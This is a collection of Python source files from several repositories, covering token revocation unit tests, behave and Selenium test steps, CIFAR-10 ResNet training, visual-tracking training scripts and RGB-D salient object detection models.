self._assertTokenNotRevoked(token_data_2)
def remove_event(self, event):
self.events.remove(event)
remove_event(self.revoke_events, event)
def test_by_project_and_user_and_role(self):
user_id1 = uuid.uuid4().hex
user_id2 = uuid.uuid4().hex
project_id = uuid.uuid4().hex
self.events.append(self._revoke_by_user(user_id1))
self.events.append(
self._revoke_by_user_and_project(user_id2, project_id))
token_data = _sample_blank_token()
token_data['user_id'] = user_id2
token_data['project_id'] = project_id
self._assertTokenRevoked(token_data)
def test_by_domain_user(self):
        # If a domain is revoked, then a token for a user in the domain is
        # revoked
user_id = uuid.uuid4().hex
domain_id = uuid.uuid4().hex
token_data = _sample_blank_token()
token_data['user_id'] = user_id
token_data['identity_domain_id'] = domain_id
self._revoke_by_domain(domain_id)
self._assertTokenRevoked(token_data)
def test_by_domain_project(self):
        # If a domain is revoked, then a token scoped to a project in the
        # domain is revoked.
user_id = uuid.uuid4().hex
user_domain_id = uuid.uuid4().hex
project_id = uuid.uuid4().hex
project_domain_id = uuid.uuid4().hex
token_data = _sample_blank_token()
token_data['user_id'] = user_id
token_data['identity_domain_id'] = user_domain_id
token_data['project_id'] = project_id
token_data['assignment_domain_id'] = project_domain_id
self._revoke_by_domain(project_domain_id)
self._assertTokenRevoked(token_data)
def test_by_domain_domain(self):
        # If a domain is revoked, then a token scoped to the domain is revoked.
user_id = uuid.uuid4().hex
user_domain_id = uuid.uuid4().hex
domain_id = uuid.uuid4().hex
token_data = _sample_blank_token()
token_data['user_id'] = user_id
token_data['identity_domain_id'] = user_domain_id
token_data['assignment_domain_id'] = domain_id
self._revoke_by_domain(domain_id)
self._assertTokenRevoked(token_data)
def _assertEmpty(self, collection):
return self.assertEqual(0, len(collection), "collection not empty")
def test_cleanup(self):
events = self.events
self._assertEmpty(self.revoke_events)
for i in range(0, 10):
events.append(
self._revoke_by_project_role_assignment(uuid.uuid4().hex,
uuid.uuid4().hex))
events.append(
self._revoke_by_domain_role_assignment(uuid.uuid4().hex,
uuid.uuid4().hex))
events.append(
self._revoke_by_domain_role_assignment(uuid.uuid4().hex,
uuid.uuid4().hex))
events.append(
self._revoke_by_user_and_project(uuid.uuid4().hex,
uuid.uuid4().hex))
for event in self.events:
remove_event(self.revoke_events, event)
self._assertEmpty(self.revoke_events)
``` |
{
"source": "jiwanski/qabrica",
"score": 3
} |
#### File: features/steps/multiples_of_3_or_5.py
```python
from behave import given, when, then
from ...src import multiples_of_3_or_5
from hamcrest import assert_that, equal_to, greater_than
@given(u'I have a positive "{number}"')
def step_impl(context, number):
context.number = int(number)
assert_that(context.number, greater_than(0))
@when(u'I find sum of all multiples of 3 or 5 below "{number}"')
def step_impl(context, number):
context.number = int(number)
context.result = multiples_of_3_or_5.solution(context.number)
@then(u'The result should be equal to "{result}"')
def step_impl(context, result):
assert_that(context.result, equal_to(int(result)))
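# Illustrative note (hypothetical, not taken from the repository): these step
# definitions would back a Gherkin scenario along the lines of
#
#     Given I have a positive "10"
#     When I find sum of all multiples of 3 or 5 below "10"
#     Then The result should be equal to "23"
#
# since the multiples of 3 or 5 below 10 are 3, 5, 6 and 9, which sum to 23.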
```
#### File: python_pytest/test/conftest.py
```python
import pytest
from selenium import webdriver
@pytest.fixture(scope="class")
def setup(request):
driver = webdriver.Firefox()
driver.get("http://www.wordpress.org")
request.cls.driver = driver
yield driver
driver.close()
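    # Descriptive note (added for clarity): everything before `yield` is fixture
    # setup and everything after it is teardown, so the browser is closed once
    # the class-scoped fixture is finalized. `request.cls.driver = driver`
    # exposes the WebDriver instance as `self.driver` to any test class marked
    # with @pytest.mark.usefixtures("setup").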
```
#### File: python_pytest/test/test_title_with_html_entity.py
```python
import pytest
@pytest.mark.usefixtures("setup")
class Test:
def test_verify_title(self):
        # Encode non-ASCII characters (here an em dash) as HTML character
        # references so the comparison is stable across encodings.
        title_actual = self.driver.title.encode('ascii', 'xmlcharrefreplace').decode('ascii')
        title_expected = 'Blog Tool, Publishing Platform, and CMS &#8212; WordPress'
assert title_expected == title_actual
``` |
{
"source": "jiweeo/pytorch-stochastic-depth",
"score": 2
} |
#### File: jiweeo/pytorch-stochastic-depth/train.py
```python
import os
import torch
import torch.nn as nn
import torch.utils.data as D
import tqdm
import torch.optim as optim
import torch.backends.cudnn as cudnn
import argparse
from models import resnet, base
import numpy as np
import tensorboard_logger
import torchvision.transforms as transforms
import torchvision.datasets as datasets
cudnn.benchmark = True
parser = argparse.ArgumentParser(description='Dynamic ResNet Training')
parser.add_argument('--lr', type=float, default=.1, help='learning rate')
parser.add_argument('--batch_size', type=int, default=128, help='batch size')
parser.add_argument('--max_epochs', type=int, default=500, help='total epochs to run')
parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
num_devices = torch.cuda.device_count()
def train(epoch):
rnet.train()
total = 0
correct = 0
train_loss = 0
total_batch = 0
for batch_idx, (inputs, targets) in tqdm.tqdm(enumerate(trainloader), total=len(trainloader)):
inputs, targets = inputs.to(device), targets.to(device)
probs = rnet(inputs, True)
optimizer.zero_grad()
loss = criterion(probs, targets)
loss.backward()
optimizer.step()
train_loss += loss.item()
_, predicted = probs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
total_batch += 1
print('E:%d Train Loss: %.3f Train Acc: %.3f LR %f'
% (epoch,
train_loss / total_batch,
correct / total,
optimizer.param_groups[0]['lr']))
tensorboard_logger.log_value('train_acc', correct/total, epoch)
tensorboard_logger.log_value('train_loss', train_loss / total_batch, epoch)
def test(epoch):
global best_test_acc
rnet.eval()
total = 0
correct = 0
test_loss = 0
total_batch = 0
for batch_idx, (inputs, targets) in tqdm.tqdm(enumerate(testloader), total=len(testloader)):
inputs, targets = inputs.to(device), targets.to(device)
probs = rnet(inputs)
loss = criterion(probs, targets)
test_loss += loss.item()
_, predicted = probs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
total_batch += 1
print('E:%d Test Loss: %.3f Test Acc: %.3f'
% (epoch, test_loss / total_batch, correct / total))
# save best model
acc = 100.*correct/total
if acc > best_test_acc:
best_test_acc = acc
print('saving best model...')
state = {
'net': rnet.state_dict(),
'acc': acc,
'epoch': epoch,
}
torch.save(state, 'resnet110.t7')
tensorboard_logger.log_value('test_acc', acc, epoch)
tensorboard_logger.log_value('test_loss', test_loss/total_batch, epoch)
def adjust_learning_rate(epoch, stage=[250, 375]):
order = np.sum(epoch >= np.array(stage))
lr = args.lr * (0.1 ** order)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
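# Worked example (added for clarity, not in the original script): with the
# default stage=[250, 375] and --lr 0.1 the schedule evaluates to
#   epoch < 250         -> order 0 -> lr = 0.1
#   250 <= epoch < 375  -> order 1 -> lr = 0.01
#   epoch >= 375        -> order 2 -> lr = 0.001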
def get_transforms():
train_tf = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
test_tf = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
return train_tf, test_tf
# dataset and dataloader
train_tf, test_tf = get_transforms()
trainset = datasets.CIFAR10(root='./data', train=True, download=True, transform=train_tf)
testset = datasets.CIFAR10(root='./data', train=False, download=True, transform=test_tf)
trainloader = D.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=4, pin_memory=True)
testloader = D.DataLoader(testset, batch_size=args.batch_size, shuffle=False, num_workers=4, pin_memory=True)
best_test_acc = 0.0
# resnet110
num_layers = 54
rnet = resnet.FlatResNet32(base.BasicBlock, [18, 18, 18], num_classes=10)
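# Descriptive note (added for clarity): 3 stages x 18 BasicBlocks = 54 residual
# blocks (num_layers above); with two 3x3 convolutions per block plus the stem
# convolution and the final classifier, this matches the standard 6n+2 = 110
# layer CIFAR ResNet, hence the 'resnet110' checkpoint name.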
rnet.to(device)
if num_devices > 1:
print('paralleling for multiple GPUs...')
rnet = nn.DataParallel(rnet)
start_epoch = 0
if args.resume:
assert os.path.isfile('resnet110.t7'), 'Error: no check-point found!'
ckpt = torch.load('resnet110.t7')
rnet.load_state_dict(ckpt['net'])
best_test_acc = ckpt['acc']
start_epoch = ckpt['epoch']
else:
    # He (Kaiming) initialization
for module in rnet.modules():
if isinstance(module, nn.Conv2d):
nn.init.kaiming_normal_(module.weight, mode='fan_out', nonlinearity='relu')
# Loss Fn and Optimizer
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(rnet.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4)
# logger
tensorboard_logger.configure('./log/run1')
for epoch in range(start_epoch+1, args.max_epochs):
train(epoch)
test(epoch)
adjust_learning_rate(epoch)
``` |
{
"source": "jiweeo/RL-Tracking",
"score": 2
} |
#### File: RL-Tracking/pytorch/OTB-test.py
```python
from test import test
from utils import get_transform
from train import Reinforce
from environment import Env
import os
import numpy as np
import torch
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
def main():
transform = get_transform()
R = Reinforce(None, transforms=transform)
env = Env()
data_root = '../data/OTB100'
model_root = '../cv/run2/latest.pth'
# load weights
if os.path.isfile(model_root):
print("=> loading checkpoint '{}'".format(model_root))
checkpoint = torch.load(model_root)
R.agent.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(model_root, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(model_root))
test_list = os.listdir(data_root)
for i, filename in enumerate(test_list):
print('[%d/%d] testing %s' % (i, len(test_list), filename))
predicted_bbox = test(env, R, os.path.join(data_root, filename), data_name='otb')
predicted_bbox = np.vstack(predicted_bbox)
np.savetxt(os.path.join(data_root, filename, 'pred_rect_sl.txt'), predicted_bbox, fmt='%.3f')
if __name__ == '__main__':
main()
```
#### File: RL-Tracking/pytorch/train_sl.py
```python
import argparse
import Dataset
from utils import AverageMeter, get_transform
from torch.utils.data import DataLoader
import Network
import torch
import time
from torch.nn import functional as F
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
def parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('--max_epochs', type=int, default=5000)
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=0.9)
parser.add_argument('--save_freq', type=int, default=5000)
parser.add_argument('--train_data', type=str, default='../data/train/')
parser.add_argument('--num_workers', type=int, default=8)
parser.add_argument('--test_data', type=str, default='../data/test/')
parser.add_argument('--test_freq', type=int, default=5)
parser.add_argument('--resume', type=str, default='', help='path to checkpoint (default: none)')
parser.add_argument('--load', type=str, default='', help='path to checkpoint(default: none)')
parser.add_argument('--log_freq', type=int, default=10)
parser.add_argument('--name', type=str, default='run')
return parser.parse_args()
def train(epoch, net, optimizer, train_loader):
# setting metrics
end = time.time()
batch_time = AverageMeter()
data_time = AverageMeter()
cls_losses = AverageMeter()
action_losses = AverageMeter()
action_accs = AverageMeter()
cls_accs = AverageMeter()
weight = torch.Tensor([1, 1]).cuda()
net.train()
for i, (input, target_action, target_cls) in enumerate(train_loader):
data_time.update(time.time() - end)
input, target_cls, target_action = input.cuda(), target_cls.cuda(), target_action.cuda()
# run model
action, cls = net(input)
# cal loss
action_loss = F.cross_entropy(action, target_action)
cls_loss = F.cross_entropy(cls, target_cls, weight=weight)
action_losses.update(action_loss)
cls_losses.update(cls_loss)
loss = action_loss * 5 + cls_loss
# update net
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
# cal acc
action = torch.argmax(action, 1)
cls = torch.argmax(cls, 1)
correct_action = (action == target_action).cpu().sum()
correct_cls = (cls == target_cls).cpu().sum()
action_acc = float(correct_action) / input.shape[0]
cls_acc = float(correct_cls) / input.shape[0]
action_accs.update(action_acc)
cls_accs.update(cls_acc)
batch_time.update(time.time()-end)
end = time.time()
        if i % args.log_freq == 0:
            print('Epoch: [{0}][{1}/{2}]\t'
                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                  'Action_Loss {action_loss.val:.4f} ({action_loss.avg:.4f})\t'
                  'Class_Loss {cls_loss.val:.4f} ({cls_loss.avg:.4f})\t'
                  'action_acc {action_acc.val:.4f} ({action_acc.avg:.4f})\t'
                  'cls_acc {cls_acc.val:.4f} ({cls_acc.avg:.4f})'.format(
                      epoch, i, len(train_loader), batch_time=batch_time,
                      action_loss=action_losses, cls_loss=cls_losses,
                      action_acc=action_accs, cls_acc=cls_accs))
def test(epoch, net, test_loader):
end = time.time()
batch_time = AverageMeter()
action_accs = AverageMeter()
cls_accs = AverageMeter()
net.eval()
for i, (input, target_action, target_cls) in enumerate(test_loader):
input, target_cls, target_action = input.cuda(), target_cls.cuda(), target_action.cuda()
# run model
action, cls = net(input)
# cal acc
action = torch.argmax(action, 1)
cls = torch.argmax(cls, 1)
correct_action = (action == target_action).cpu().sum()
correct_cls = (cls == target_cls).cpu().sum()
action_acc = float(correct_action) / input.shape[0]
cls_acc = float(correct_cls) / input.shape[0]
action_accs.update(action_acc)
cls_accs.update(cls_acc)
batch_time.update(time.time()-end)
end = time.time()
        if i % args.log_freq == 0:
            print('Epoch: [{0}][{1}/{2}]\t'
                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                  'action_acc {action_acc.val:.4f} ({action_acc.avg:.4f})\t'
                  'cls_acc {cls_acc.val:.4f} ({cls_acc.avg:.4f})'.format(
                      epoch, i, len(test_loader), batch_time=batch_time,
                      action_acc=action_accs, cls_acc=cls_accs))
return action_accs.avg
def save_checkpoint(state, is_best):
directory = "cv/%s/"%(args.name)
if not os.path.exists(directory):
os.makedirs(directory)
filename = os.path.join(directory, 'epoch-{}.pth'.format(state['epoch']))
torch.save(state, directory + 'latest.pth')
if state['epoch'] % 10 == 0:
torch.save(state, filename)
if is_best:
torch.save(state, directory + 'model_best.pth')
def main():
global args
global best_acc
best_acc = 0
args = parse_arguments()
transfrom = get_transform()
train_dataset = Dataset.TrackData_SL(args.train_data, transfrom)
test_dataset = Dataset.TrackData_SL(args.test_data, transfrom)
train_loader = DataLoader(train_dataset, num_workers=args.num_workers, shuffle=True, batch_size=args.batch_size)
test_loader = DataLoader(test_dataset, num_workers=args.num_workers, shuffle=False, batch_size=args.batch_size)
net = Network.Tracknet()
net.cuda()
optimizer = torch.optim.Adam(net.parameters(), args.lr)
start_epoch = 0
    if args.resume:
        ckpt = torch.load(args.resume)
        net.load_state_dict(ckpt['state_dict'])
        optimizer.load_state_dict(ckpt['optimizer'])
        best_acc = ckpt['best_accuracy']
        start_epoch = ckpt['epoch']
for e in range(start_epoch, args.max_epochs):
train(e, net, optimizer, train_loader)
if e % args.test_freq == 0:
acc = test(e, net, test_loader)
is_best = acc > best_acc
best_acc = max(best_acc, acc)
# save model
save_checkpoint({
'epoch': e + 1,
'state_dict': net.state_dict(),
'best_accuracy': best_acc,
'optimizer': optimizer.state_dict()
}, is_best)
if __name__ == '__main__':
main()
``` |
{
"source": "jiwei0921/DCF",
"score": 2
} |
#### File: DCF/DCF_code/demo_test.py
```python
import torch
import torch.nn.functional as F
import numpy as np
import pdb, os, argparse
from skimage import io
from tqdm import trange
from model.DCF_models import DCF_VGG
from model.DCF_ResNet_models import DCF_ResNet
from model.fusion import fusion
from evaluateSOD.main import evalateSOD
from data import test_dataset
from model.depth_calibration_models import discriminator, depth_estimator
def eval_data(dataset_path, test_datasets, ckpt_name):
parser = argparse.ArgumentParser()
parser.add_argument('--testsize', type=int, default=352, help='testing size')
parser.add_argument('--is_ResNet', type=bool, default=True, help='VGG or ResNet backbone')
parser.add_argument('--snapshot', type=str, default=ckpt_name, help='checkpoint name')
cfg = parser.parse_args()
if cfg.is_ResNet:
model_rgb = DCF_ResNet()
model_depth = DCF_ResNet()
model = fusion()
model_discriminator = discriminator(n_class=2)
model_estimator = depth_estimator()
model_rgb.load_state_dict(torch.load('./ckpt/DCF_Resnet/'+'DCF_rgb.pth' +cfg.snapshot))
model_depth.load_state_dict(torch.load('./ckpt/DCF_Resnet/' +'DCF_depth.pth' + cfg.snapshot))
model.load_state_dict(torch.load('./ckpt/DCF_Resnet/' + 'DCF.pth' +cfg.snapshot))
model_discriminator.load_state_dict(torch.load('./ckpt/DCF_Resnet/' + 'DCF_dis.pth' + cfg.snapshot))
model_estimator.load_state_dict(torch.load('./ckpt/DCF_Resnet/' + 'DCF_estimator.pth' + cfg.snapshot))
else:
model_rgb = DCF_VGG()
model_depth = DCF_VGG()
model = fusion()
model_discriminator = discriminator(n_class=2)
model_estimator = depth_estimator()
model_rgb.load_state_dict(torch.load('./ckpt/DCF_VGG/'+'DCF_rgb.pth' +cfg.snapshot))
model_depth.load_state_dict(torch.load('./ckpt/DCF_VGG/' + 'DCF_depth.pth' +cfg.snapshot))
model.load_state_dict(torch.load('./ckpt/DCF_VGG/' +'DCF.pth' + cfg.snapshot))
model_discriminator.load_state_dict(torch.load('./ckpt/DCF_VGG/' + 'DCF_dis.pth' + cfg.snapshot))
model_estimator.load_state_dict(torch.load('./ckpt/DCF_Resnet/' + 'DCF_estimator.pth' + cfg.snapshot))
cuda = torch.cuda.is_available()
if cuda:
model_rgb.cuda()
model_depth.cuda()
model.cuda()
model_discriminator.cuda()
model_estimator.cuda()
model_rgb.eval()
model_depth.eval()
model.eval()
model_estimator.eval()
model_discriminator.eval()
for dataset in test_datasets:
if cfg.is_ResNet:
save_path = './results/ResNet50/' + dataset + '/'
else:
save_path = './results/VGG16/' + dataset + '/'
if not os.path.exists(save_path):
os.makedirs(save_path)
image_root = dataset_path + dataset + '/test_images/'
gt_root = dataset_path + dataset + '/test_masks/'
depth_root = dataset_path + dataset + '/test_depth/'
test_loader = test_dataset(image_root, gt_root, depth_root, cfg.testsize)
print('Evaluating dataset: %s' %(dataset))
'''~~~ YOUR FRAMEWORK~~~'''
for i in trange(test_loader.size):
image, gt, depth, name = test_loader.load_data()
if cuda:
image = image.cuda()
depth = depth.cuda()
# RGB Stream
_, res_r,x3_r,x4_r,x5_r = model_rgb(image)
# depth calibration
score= model_discriminator(depth)
score = torch.softmax(score,dim=1)
x3_, x4_, x5_ = x3_r.detach(), x4_r.detach(), x5_r.detach()
pred_depth = model_estimator(image,x3_, x4_, x5_)
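            # Descriptive note (added for clarity): score[:, 0] and score[:, 1]
            # are per-image confidence weights from the discriminator; below they
            # are broadcast to the full spatial size so the raw depth map and the
            # estimated depth map are blended accordingly.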
depth_calibrated = torch.mul(depth, score[:, 0].unsqueeze(-1).unsqueeze(-1).unsqueeze(-1).
expand(-1, 1, cfg.testsize, cfg.testsize)) \
+ torch.mul(pred_depth, score[:, 1].unsqueeze(-1).unsqueeze(-1).unsqueeze(-1).
expand(-1, 1, cfg.testsize, cfg.testsize))
depth_calibrated = torch.cat([depth_calibrated, depth_calibrated, depth_calibrated], dim=1)
# Depth Stream
_, res_d,x3_d,x4_d,x5_d = model_depth(depth_calibrated)
# Fusion Stream (CRM)
_,res,_,_,_ = model(x3_r,x4_r,x5_r,x3_d,x4_d,x5_d)
res = res+res_d+res_r
res = res.sigmoid().data.cpu().numpy().squeeze()
res = (res - res.min()) / (res.max() - res.min() + 1e-8)
io.imsave(save_path+name, np.uint8(res * 255))
_ = evalateSOD(save_path, gt_root, dataset,ckpt_name)
return
if __name__ == '__main__':
dataset_path = '/Data/test_data/'
test_datasets=['LFSD']
# test_datasets = ['NJU2K', 'NLPR', 'SIP', 'LFSD', 'DES','SSD','DUT','STERE']
ckpt_name = '.85'
eval_data(dataset_path,test_datasets,ckpt_name)
```
#### File: DCF_code/model/DCF_models.py
```python
import torch
import torch.nn as nn
from model.HolisticAttention import HA
from model.vgg import B2_VGG
class RFB(nn.Module):
def __init__(self, in_channel, out_channel):
super(RFB, self).__init__()
self.relu = nn.ReLU(True)
self.branch0 = nn.Sequential(
nn.Conv2d(in_channel, out_channel, 1),
)
self.branch1 = nn.Sequential(
nn.Conv2d(in_channel, out_channel, 1),
nn.Conv2d(out_channel, out_channel, kernel_size=(1, 3), padding=(0, 1)),
nn.Conv2d(out_channel, out_channel, kernel_size=(3, 1), padding=(1, 0)),
nn.Conv2d(out_channel, out_channel, 3, padding=3, dilation=3)
)
self.branch2 = nn.Sequential(
nn.Conv2d(in_channel, out_channel, 1),
nn.Conv2d(out_channel, out_channel, kernel_size=(1, 5), padding=(0, 2)),
nn.Conv2d(out_channel, out_channel, kernel_size=(5, 1), padding=(2, 0)),
nn.Conv2d(out_channel, out_channel, 3, padding=5, dilation=5)
)
self.branch3 = nn.Sequential(
nn.Conv2d(in_channel, out_channel, 1),
nn.Conv2d(out_channel, out_channel, kernel_size=(1, 7), padding=(0, 3)),
nn.Conv2d(out_channel, out_channel, kernel_size=(7, 1), padding=(3, 0)),
nn.Conv2d(out_channel, out_channel, 3, padding=7, dilation=7)
)
self.conv_cat = nn.Conv2d(4*out_channel, out_channel, 3, padding=1)
self.conv_res = nn.Conv2d(in_channel, out_channel, 1)
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(std=0.01)
m.bias.data.fill_(0)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
x3 = self.branch3(x)
x_cat = torch.cat((x0, x1, x2, x3), 1)
x_cat = self.conv_cat(x_cat)
x = self.relu(x_cat + self.conv_res(x))
return x
class aggregation(nn.Module):
def __init__(self, channel):
super(aggregation, self).__init__()
self.relu = nn.ReLU(True)
self.upsample = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)
self.conv_upsample1 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample2 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample3 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample4 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample5 = nn.Conv2d(2*channel, 2*channel, 3, padding=1)
self.conv_concat2 = nn.Conv2d(2*channel, 2*channel, 3, padding=1)
self.conv_concat3 = nn.Conv2d(3*channel, 3*channel, 3, padding=1)
self.conv4 = nn.Conv2d(3*channel, 3*channel, 3, padding=1)
self.conv5 = nn.Conv2d(3*channel, 1, 1)
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(std=0.01)
m.bias.data.fill_(0)
def forward(self, x1, x2, x3):
# x1: 1/16 x2: 1/8 x3: 1/4
x1_1 = x1
x2_1 = self.conv_upsample1(self.upsample(x1)) * x2
x3_1 = self.conv_upsample2(self.upsample(self.upsample(x1))) \
* self.conv_upsample3(self.upsample(x2)) * x3
x2_2 = torch.cat((x2_1, self.conv_upsample4(self.upsample(x1_1))), 1)
x2_2 = self.conv_concat2(x2_2)
x3_2 = torch.cat((x3_1, self.conv_upsample5(self.upsample(x2_2))), 1)
x3_2 = self.conv_concat3(x3_2)
x = self.conv4(x3_2)
x = self.conv5(x)
return x
class DCF_VGG(nn.Module):
def __init__(self, channel=32):
super(DCF_VGG, self).__init__()
self.vgg = B2_VGG()
self.rfb3_1 = RFB(256, channel)
self.rfb4_1 = RFB(512, channel)
self.rfb5_1 = RFB(512, channel)
self.agg1 = aggregation(channel)
self.rfb3_2 = RFB(256, channel)
self.rfb4_2 = RFB(512, channel)
self.rfb5_2 = RFB(512, channel)
self.agg2 = aggregation(channel)
self.HA = HA()
self.upsample = nn.Upsample(scale_factor=4, mode='bilinear', align_corners=False)
def forward(self, x):
x1 = self.vgg.conv1(x)
x2 = self.vgg.conv2(x1)
x3 = self.vgg.conv3(x2)
x3_1 = x3
x4_1 = self.vgg.conv4_1(x3_1)
x5_1 = self.vgg.conv5_1(x4_1)
x3_1 = self.rfb3_1(x3_1)
x4_1 = self.rfb4_1(x4_1)
x5_1 = self.rfb5_1(x5_1)
attention = self.agg1(x5_1, x4_1, x3_1)
x3_2 = self.HA(attention.sigmoid(), x3)
x4_2 = self.vgg.conv4_2(x3_2)
x5_2 = self.vgg.conv5_2(x4_2)
x3_2 = self.rfb3_2(x3_2)
x4_2 = self.rfb4_2(x4_2)
x5_2 = self.rfb5_2(x5_2)
detection = self.agg2(x5_2, x4_2, x3_2)
#return self.upsample(attention), self.upsample(detection)
return self.upsample(attention), self.upsample(detection),x3_2,x4_2,x5_2
``` |
{
"source": "jiwei0921/DMRA",
"score": 3
} |
#### File: jiwei0921/DMRA/dataset_loader.py
```python
import os
import numpy as np
import PIL.Image
import scipy.io as sio
import torch
from torch.utils import data
import cv2
class MyData(data.Dataset): # inherit
"""
load data in a folder
"""
mean_rgb = np.array([0.447, 0.407, 0.386])
std_rgb = np.array([0.244, 0.250, 0.253])
def __init__(self, root, transform=False):
super(MyData, self).__init__()
self.root = root
self._transform = transform
img_root = os.path.join(self.root, 'train_images')
lbl_root = os.path.join(self.root, 'train_masks')
depth_root = os.path.join(self.root, 'train_depth')
file_names = os.listdir(img_root)
self.img_names = []
self.lbl_names = []
self.depth_names = []
for i, name in enumerate(file_names):
if not name.endswith('.jpg'):
continue
self.lbl_names.append(
os.path.join(lbl_root, name[:-4]+'.png')
)
self.img_names.append(
os.path.join(img_root, name)
)
self.depth_names.append(
os.path.join(depth_root, name[:-4]+'.png')
)
def __len__(self):
return len(self.img_names)
def __getitem__(self, index):
# load image
img_file = self.img_names[index]
img = PIL.Image.open(img_file)
img = np.array(img, dtype=np.uint8)
img = cv2.resize(img, (256, 256), interpolation=cv2.INTER_AREA)
# load label
lbl_file = self.lbl_names[index]
lbl = PIL.Image.open(lbl_file).convert('L')
lbl = np.array(lbl, dtype=np.int32)
lbl = cv2.resize(lbl, (256, 256), interpolation=cv2.INTER_AREA)
lbl[lbl != 0] = 1
# load depth
depth_file = self.depth_names[index]
depth = PIL.Image.open(depth_file).convert('L')
depth = np.array(depth, dtype=np.uint8)
depth = cv2.resize(depth, (256, 256), interpolation=cv2.INTER_AREA)
if self._transform:
return self.transform(img, lbl, depth)
else:
return img, lbl, depth
# Translating numpy_array into format that pytorch can use on Code.
def transform(self, img, lbl, depth):
img = img.astype(np.float64)/255.0
img -= self.mean_rgb
img /= self.std_rgb
img = img.transpose(2, 0, 1) # to verify
img = torch.from_numpy(img).float()
lbl = torch.from_numpy(lbl).long()
depth = depth.astype(np.float64)/255.0
depth = torch.from_numpy(depth).float()
return img, lbl, depth
class MyTestData(data.Dataset):
"""
load data in a folder
"""
mean_rgb = np.array([0.447, 0.407, 0.386])
std_rgb = np.array([0.244, 0.250, 0.253])
def __init__(self, root, transform=False):
super(MyTestData, self).__init__()
self.root = root
self._transform = transform
img_root = os.path.join(self.root, 'test_images')
depth_root = os.path.join(self.root, 'test_depth')
file_names = os.listdir(img_root)
self.img_names = []
self.names = []
self.depth_names = []
for i, name in enumerate(file_names):
if not name.endswith('.jpg'):
continue
self.img_names.append(
os.path.join(img_root, name)
)
self.names.append(name[:-4])
self.depth_names.append(
# os.path.join(depth_root, name[:-4]+'_depth.png') # Test RGBD135 dataset
os.path.join(depth_root, name[:-4] + '.png')
)
def __len__(self):
return len(self.img_names)
def __getitem__(self, index):
# load image
img_file = self.img_names[index]
img = PIL.Image.open(img_file)
img_size = img.size
img = np.array(img, dtype=np.uint8)
img = cv2.resize(img, (256, 256), interpolation=cv2.INTER_AREA)
        # load depth
depth_file = self.depth_names[index]
depth = PIL.Image.open(depth_file).convert('L')
depth = np.array(depth, dtype=np.uint8)
depth = cv2.resize(depth, (256, 256), interpolation=cv2.INTER_AREA)
if self._transform:
            img, depth = self.transform(img, depth)
            return img, depth, self.names[index], img_size
else:
return img, depth, self.names[index], img_size
def transform(self, img, depth):
img = img.astype(np.float64)/255.0
img -= self.mean_rgb
img /= self.std_rgb
img = img.transpose(2, 0, 1)
img = torch.from_numpy(img).float()
depth = depth.astype(np.float64)/255.0
depth = torch.from_numpy(depth).float()
return img, depth
``` |
{
"source": "jiwei0921/DSU",
"score": 2
} |
#### File: DSU/DSU_Code/DSU_train.py
```python
import torch
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import pdb, os, argparse
from tqdm import tqdm
from datetime import datetime
from model.CPD_ResNet_models import CPD_ResNet
from model.Sal_CNN import Sal_CNN
from data import get_loader
from utils import clip_gradient, adjust_lr
from DSU_test import eval_data
from tensorboardX import SummaryWriter
import torch.backends.cudnn as cudnn
from attentive_training import loss_weight, update_pseudoLabel, ContrastiveLoss
cudnn.benchmark = True
writer = SummaryWriter()
parser = argparse.ArgumentParser()
parser.add_argument('--ckpt_load', type=bool, default=False, help='whether load checkpoint or not')
parser.add_argument('--snapshot', type=int, default=None, help='load checkpoint number')
parser.add_argument('--epoch', type=int, default=40, help='epoch number')
parser.add_argument('--lr', type=float, default=1e-4, help='learning rate')
parser.add_argument('--batchsize', type=int, default=10, help='training batch size')
parser.add_argument('--trainsize', type=int, default=352, help='training dataset size')
parser.add_argument('--clip', type=float, default=0.5, help='gradient clipping margin')
parser.add_argument('--decay_rate', type=float, default=0.1, help='decay rate of learning rate')
parser.add_argument('--decay_epoch', type=int, default=200, help='every n epochs decay learning rate')
opt = parser.parse_args()
image_root = '../Dataset/train_data/images/'
depth_root = '../Dataset/train_data/depth/'
gt_root = '../Dataset/train_data/fake_mask/'
# GT is generated by CDCP [1] method that does not require any human annotation efforts.
# [1] An Innovative Salient Object Detection using Center-dark Channel Prior, ICCVW, 2017.
val_root = '../Dataset/test_data/'
validation = ['NJUD']
# build models
# Both Saliency and Depth Networks employ the CPD [2] extractor equipped with ResNet-50.
# [2] Cascaded Partial Decoder for Fast and Accurate Salient Object Detection, CVPR, 2019.
model_rgb = CPD_ResNet()
model_depth = CPD_ResNet()
model = Sal_CNN()
if opt.ckpt_load:
